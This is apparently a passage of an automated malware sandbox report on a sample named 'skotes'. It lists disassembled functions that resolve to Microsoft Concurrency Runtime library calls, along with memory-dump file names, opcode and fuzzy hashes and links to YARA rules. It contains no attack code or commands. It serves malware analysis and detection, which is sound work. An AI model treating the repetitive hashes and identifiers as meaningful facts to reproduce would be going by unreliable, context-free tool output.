                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2530155754-0
                                                                                                                                                                                                                                          • Opcode ID: 709319297635fc71c4f4c50e0291c37c8ba638ed6c68c9b5f6f7c353e6610d3c
                                                                                                                                                                                                                                          • Instruction ID: 3bfeb68bfc417fac905e1e0abc0746ab86862e5b56f314f03ed4d944cd0b760b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 709319297635fc71c4f4c50e0291c37c8ba638ed6c68c9b5f6f7c353e6610d3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F481587490024AABDF169F54C9A1FFE7BA3EF46304F04409CEC416A352C7768D5ADBA1
                                                                                                                                                                                                                                          Function 006C2970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 006C2982
                                                                                                                                                                                                                                            • Part of subcall function 006C24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006C2504
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 006C29A3
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 006C29B0
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 006C29FE
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 006C2AA6
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 006C2AD8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1256429809-0
                                                                                                                                                                                                                                          • Opcode ID: 1c9f202c38913b24eab6bfe4ffb6719de703e8921c931903e8a948a34a105b6c
                                                                                                                                                                                                                                          • Instruction ID: 642c96c07ef191fd169900ba1988ac07de37ba3ab6aaac1a179c974428f1d9c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c9f202c38913b24eab6bfe4ffb6719de703e8921c931903e8a948a34a105b6c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E471657090024AABDF159FA8C8A1FFEBBA6EF45308F04409DEC416B352C7329D16DB61
                                                                                                                                                                                                                                          Function 006B2832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 006B2876
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006B28DF
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006B2913
                                                                                                                                                                                                                                            • Part of subcall function 006B07ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 006B080D
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 006B2993
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006B29DB
                                                                                                                                                                                                                                            • Part of subcall function 006B07C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006B07DE
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006B29EF
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006B2A00
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 006B2A4D
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 006B2A7E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1321587334-0
                                                                                                                                                                                                                                          • Opcode ID: 5a414f686fc7f2136137480d1f045eb29bffb42c91410cf9164300de45ad97f3
                                                                                                                                                                                                                                          • Instruction ID: 564ca3db93ea9cdc39d6a45476c3664ce70660f2a2695ad2122f70823c6d0bd0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a414f686fc7f2136137480d1f045eb29bffb42c91410cf9164300de45ad97f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13817AB1A006179BCB28DFA9D8A15FEBBF3BB48310B24502DD546A7351DB30ADC5CB94
                                                                                                                                                                                                                                          Function 006B69DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 006B6A1F
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 006B6A51
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 006B6A8C
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 006B6A9D
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 006B6AB9
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 006B6AF4
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 006B6B05
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006B6B20
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 006B6B5B
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 006B6B68
                                                                                                                                                                                                                                            • Part of subcall function 006B5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006B5EF7
                                                                                                                                                                                                                                            • Part of subcall function 006B5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006B5F09
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
